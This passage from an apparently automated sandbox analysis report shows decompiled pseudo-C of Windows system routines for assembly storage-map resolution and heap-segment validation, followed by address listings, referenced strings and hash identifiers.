												goto L21;
											}
										}
										E01365720(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n",  *((intOrPtr*)(_v1080 + 4)));
										_t274 = 0xc000003a;
										goto L21;
									}
									L19:
									_t271 = _t253;
									_t207 = E0130CE6C(_v1168, _t253, _v1080,  &_v1084);
									_t274 = _t207;
									if(_t207 < 0) {
										E01365720(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t274);
									} else {
										_t274 = 0;
									}
									goto L21;
								}
								_v1094 = _t188;
								_t218 = E012F3A1C(_t277);
								_v1092 = _t218;
								if(_t218 != 0) {
									_t264 =  &_v1096;
									_v1080 =  &_v1096;
									goto L39;
								}
								_t274 = 0xc0000017;
								goto L24;
							}
							_t274 = 0xc00000e5;
							goto L23;
						}
						_t274 = 0xc00000e5;
						goto L26;
					}
					_v1080 = _v1080 & 0x00000000;
					_t219 =  *((intOrPtr*)(_t276 + 0x50));
					_v1152 = _t219;
					_v1150 = _t219;
					_v1144 = __edx;
					_v1148 =  *((intOrPtr*)(_t276 + 0x54)) + _t260;
					_v1140 = _t253;
					_v1128 =  &_v552;
					_v1136 = 0;
					_v1132 = 0x2160000;
					_v1124 = 0;
					_v1116 = 0;
					_v1120 = 0;
					E0130CCC0(1,  &_v1144, _v1104);
					if(_v1116 != 0) {
						_t274 = 0xc0000120;
						goto L23;
					}
					if(_v1124 != 0) {
						_t271 =  &_v1132;
						_t274 = E0130CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 >= 0) {
							_t271 = _t253;
							_t274 = E0130CE6C(_t272, _t253,  &_v1132,  &_v1084);
							if(_t274 < 0) {
								_push(_t274);
								_push(_t253);
								_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
								L44:
								_push(0);
								_push(0x33);
								E01365720();
								goto L23;
							}
							_t274 = 0;
							goto L23;
						}
						_push(_t274);
						_push( &_v1132);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L44;
					}
					_t279 = _v1120;
					_t272 = 0;
					_t236 = _v1136;
					_v1100 = _t236;
					_v1088 = _t279;
					_v1073 = 1;
					if(_t279 == 0) {
						L16:
						_t305 = _t272 - _t279;
						L17:
						if(_t305 == 0) {
							L54:
							_push(_t272);
							E01365720(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t274 = 0xc0150004;
							goto L22;
						}
						goto L18;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1144 = _t236;
						_v1128 =  &_v552;
						_v1140 = _t272;
						_v1132 = 0x2160000;
						_v1136 = 0;
						E0130CCC0(2,  &_v1144, _v1104);
						if(_v1136 != 0) {
							break;
						}
						_t242 = _v1132;
						if(_v1135 != 0) {
							if(_t242 == 0) {
								goto L54;
							}
							_t119 = _t272 + 1; // 0x1
							_t279 = _t119;
							_v1088 = _t279;
						}
						if(_t242 == 0) {
							L27:
							_t272 = _t272 + 1;
							if(_t272 >= _t279) {
								goto L17;
							} else {
								_t236 = _v1100;
								continue;
							}
						}
						if(_v1084 != 0) {
							_push(_v1084);
							E013195D0();
							_v1084 = _v1084 & 0x00000000;
						}
						_t271 =  &_v1132;
						_t274 = E0130CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 < 0) {
							if(_t274 != 0xc0150004) {
								_push(_t274);
								_push( &_v1152);
								E01365720(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1132);
								goto L22;
							}
							_t279 = _v1088;
							goto L27;
						} else {
							_t279 = _v1088;
							goto L16;
						}
					}
					_t274 = 0xc0000120;
					goto L22;
				}
			}




































































                                                0x0130c9bf
                                                0x0130c9d1
                                                0x0130c9d8
                                                0x0130c9dc
                                                0x0130c9e9
                                                0x0130c9eb
                                                0x0130c9f3
                                                0x0130c9f9
                                                0x0130c9fb
                                                0x0130ca01
                                                0x0130ca07
                                                0x0130ca09
                                                0x0130ca0f
                                                0x0130ca19
                                                0x0130ca1f
                                                0x0130ca25
                                                0x0130ca2b
                                                0x0130ca31
                                                0x0130ca39
                                                0x0134ac23
                                                0x0134ac23
                                                0x0134ac24
                                                0x0134ac25
                                                0x0134ac26
                                                0x0134ac34
                                                0x0134ac3c
                                                0x0130cc3c
                                                0x0130cc43
                                                0x0130cc65
                                                0x0130cc6c
                                                0x0134ac4c
                                                0x0134ac4c
                                                0x0130cc72
                                                0x0130cc79
                                                0x0134ac56
                                                0x0134ac5c
                                                0x0134ac5c
                                                0x0130cc7f
                                                0x0130cc87
                                                0x0134ac72
                                                0x0134ac72
                                                0x0130cc8d
                                                0x0130cc9f
                                                0x0130cc9f
                                                0x0130cc45
                                                0x0130cc51
                                                0x0130cc60
                                                0x00000000
                                                0x0130cc60
                                                0x0130ca41
                                                0x0134ac20
                                                0x00000000
                                                0x0130ca59
                                                0x0130ca5f
                                                0x00000000
                                                0x00000000
                                                0x0130ca65
                                                0x0130ca68
                                                0x0130ca76
                                                0x0130ca7c
                                                0x0130ca7e
                                                0x0130ca86
                                                0x0134a8ea
                                                0x0134a8f5
                                                0x0134a8fd
                                                0x00000000
                                                0x0134a8fd
                                                0x0130ca90
                                                0x0134a90d
                                                0x0134a916
                                                0x0134a918
                                                0x0134a927
                                                0x0134a930
                                                0x0134a94c
                                                0x0134a94f
                                                0x0134a955
                                                0x0134a95b
                                                0x0134a98c
                                                0x0134a992
                                                0x0134a99a
                                                0x0134a9a9
                                                0x0134a9af
                                                0x0134a9c3
                                                0x0130cc09
                                                0x0130cc10
                                                0x0134ab03
                                                0x0134ab2f
                                                0x0134ab35
                                                0x0134ab3e
                                                0x0134ab5a
                                                0x0134ab40
                                                0x0134ab40
                                                0x0134ab4c
                                                0x0134ab52
                                                0x0134ab52
                                                0x0134ab5c
                                                0x0134ab63
                                                0x0134ab6a
                                                0x0134ab76
                                                0x0134ab78
                                                0x0134ab84
                                                0x0134ab86
                                                0x0134ab8d
                                                0x0134ab97
                                                0x0134ab98
                                                0x0134aba3
                                                0x0134abad
                                                0x0134abae
                                                0x0134abb3
                                                0x0134abb9
                                                0x0134abbd
                                                0x0134abc2
                                                0x0134abc6
                                                0x0134abc8
                                                0x0134abcb
                                                0x0134abdc
                                                0x0134abdc
                                                0x0134abc6
                                                0x0134abe3
                                                0x00000000
                                                0x0134abe9
                                                0x0134abef
                                                0x0134abfc
                                                0x00000000
                                                0x0134ac01
                                                0x0134abe3
                                                0x0134ab17
                                                0x0134ab1f
                                                0x00000000
                                                0x0134ab1f
                                                0x0130cc16
                                                0x0130cc29
                                                0x0130cc2b
                                                0x0130cc30
                                                0x0130cc34
                                                0x0134ac13
                                                0x0130cc3a
                                                0x0130cc3a
                                                0x0130cc3a
                                                0x00000000
                                                0x0130cc34
                                                0x0134a95e
                                                0x0134a965
                                                0x0134a96a
                                                0x0134a972
                                                0x0134a97e
                                                0x0134a984
                                                0x00000000
                                                0x0134a984
                                                0x0134a974
                                                0x00000000
                                                0x0134a974
                                                0x0134a932
                                                0x00000000
                                                0x0134a932
                                                0x0134a91a
                                                0x00000000
                                                0x0134a91a
                                                0x0130ca96
                                                0x0130ca9d
                                                0x0130caa7
                                                0x0130caae
                                                0x0130caba
                                                0x0130cac0
                                                0x0130cace
                                                0x0130cad4
                                                0x0130cae3
                                                0x0130cae9
                                                0x0130caf3
                                                0x0130caf9
                                                0x0130caff
                                                0x0130cb05
                                                0x0130cb11
                                                0x0134a9cb
                                                0x00000000
                                                0x0134a9cb
                                                0x0130cb1e
                                                0x0134a9f8
                                                0x0134aa03
                                                0x0134aa07
                                                0x0134aa36
                                                0x0134aa47
                                                0x0134aa4b
                                                0x0134aa18
                                                0x0134aa19
                                                0x0134aa1a
                                                0x0134aa1f
                                                0x0134aa1f
                                                0x0134aa21
                                                0x0134aa23
                                                0x00000000
                                                0x0134aa28
                                                0x0134aa4d
                                                0x00000000
                                                0x0134aa4d
                                                0x0134aa09
                                                0x0134aa10
                                                0x0134aa11
                                                0x00000000
                                                0x0134aa11
                                                0x0130cb24
                                                0x0130cb2a
                                                0x0130cb2c
                                                0x0130cb32
                                                0x0130cb38
                                                0x0130cb3e
                                                0x0130cb47
                                                0x0130cc01
                                                0x0130cc01
                                                0x0130cc03
                                                0x0130cc03
                                                0x0134aac0
                                                0x0134aac0
                                                0x0134aad1
                                                0x0134aad9
                                                0x00000000
                                                0x0134aad9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0130cb4d
                                                0x0130cb4d
                                                0x0130cb53
                                                0x0130cb5f
                                                0x0130cb6e
                                                0x0130cb74
                                                0x0130cb7e
                                                0x0130cb87
                                                0x0130cb93
                                                0x00000000
                                                0x00000000
                                                0x0130cba0
                                                0x0130cba7
                                                0x0134aa57
                                                0x00000000
                                                0x00000000
                                                0x0134aa59
                                                0x0134aa59
                                                0x0134aa5c
                                                0x0134aa5c
                                                0x0130cbb0
                                                0x0130cca2
                                                0x0130cca2
                                                0x0130cca5
                                                0x00000000
                                                0x0130ccab
                                                0x0130ccab
                                                0x00000000
                                                0x0130ccab
                                                0x0130cca5
                                                0x0130cbbd
                                                0x0134aa67
                                                0x0134aa6d
                                                0x0134aa72
                                                0x0134aa72
                                                0x0130cbe6
                                                0x0130cbf1
                                                0x0130cbf5
                                                0x0134aa84
                                                0x0134aa91
                                                0x0134aa98
                                                0x0134aaa9
                                                0x00000000
                                                0x0134aaae
                                                0x0134aa86
                                                0x00000000
                                                0x0130cbfb
                                                0x0130cbfb
                                                0x00000000
                                                0x0130cbfb
                                                0x0130cbf5
                                                0x0134aab6
                                                0x00000000
                                                0x0134aab6

                                                Strings
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 0134AB0E
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 0134AAC8
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0134AA1A
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0134AC0A
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0134AC27
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 0134ABF3
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0134AC2C
                                                • @, xrefs: 0134ABA3
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 0134AA11
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 0134A8EC
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0134AAA0
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 15aebab4b4e0527667567dffed2359ac34b1098c7b3bde72c6d72a76fb6d4f3c
                                                • Instruction ID: afc6f5635862d0d7bcb1ddd33fd25d6de2613d9bdc1766b6056d171986f94cd4
                                                • Opcode Fuzzy Hash: 15aebab4b4e0527667567dffed2359ac34b1098c7b3bde72c6d72a76fb6d4f3c
                                                • Instruction Fuzzy Hash: 2A0251B1D402299BDF21DB18CD90BDAB7F8AF54708F4051DAE609A7281D730AE85CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01394AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E01394AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E012DB150();
						} else {
							E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E012DB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E012DB150();
					} else {
						E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0138FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E012DB150();
						} else {
							E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E012DB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E012DB150();
								} else {
									E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E012DB150();
									} else {
										E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E012DB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0138FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E012DB150();
										} else {
											E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0132D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E012DB150();
								} else {
									E012DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0139A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E012FE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0139A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E012FE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E012FA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E012FA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E012FBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E013823E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E012D1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                0x01394af7
                                                0x01394afb
                                                0x01394afd
                                                0x01394b01
                                                0x01394b03
                                                0x01394b08
                                                0x01394b0a
                                                0x01394b0f
                                                0x01394eb5
                                                0x01394eb5
                                                0x01394ebb
                                                0x013950d5
                                                0x013950d8
                                                0x01394ff6
                                                0x00000000
                                                0x01394ff6
                                                0x013950de
                                                0x013950e4
                                                0x013950e8
                                                0x01395107
                                                0x0139510c
                                                0x013950ea
                                                0x013950ff
                                                0x01395104
                                                0x01395112
                                                0x01395115
                                                0x01395118
                                                0x01395119
                                                0x013950cb
                                                0x013950cb
                                                0x013950af
                                                0x00000000
                                                0x013950af
                                                0x01394ecb
                                                0x013950b6
                                                0x013950bb
                                                0x01394ed1
                                                0x01394ee6
                                                0x01394eeb
                                                0x013950c1
                                                0x013950c2
                                                0x013950c5
                                                0x013950c6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01394b15
                                                0x01394b15
                                                0x01394b1c
                                                0x01394b1e
                                                0x01394b23
                                                0x01394b27
                                                0x01394b33
                                                0x01394b38
                                                0x01394b3a
                                                0x01394b3c
                                                0x01394b41
                                                0x01394b41
                                                0x01394b3a
                                                0x01394b52
                                                0x01395045
                                                0x0139504b
                                                0x0139504f
                                                0x0139506e
                                                0x01395073
                                                0x01395051
                                                0x01395066
                                                0x0139506b
                                                0x01395083
                                                0x01395088
                                                0x01395088
                                                0x0139508a
                                                0x01395091
                                                0x01395099
                                                0x01395099
                                                0x0139509d
                                                0x013950a7
                                                0x013950ad
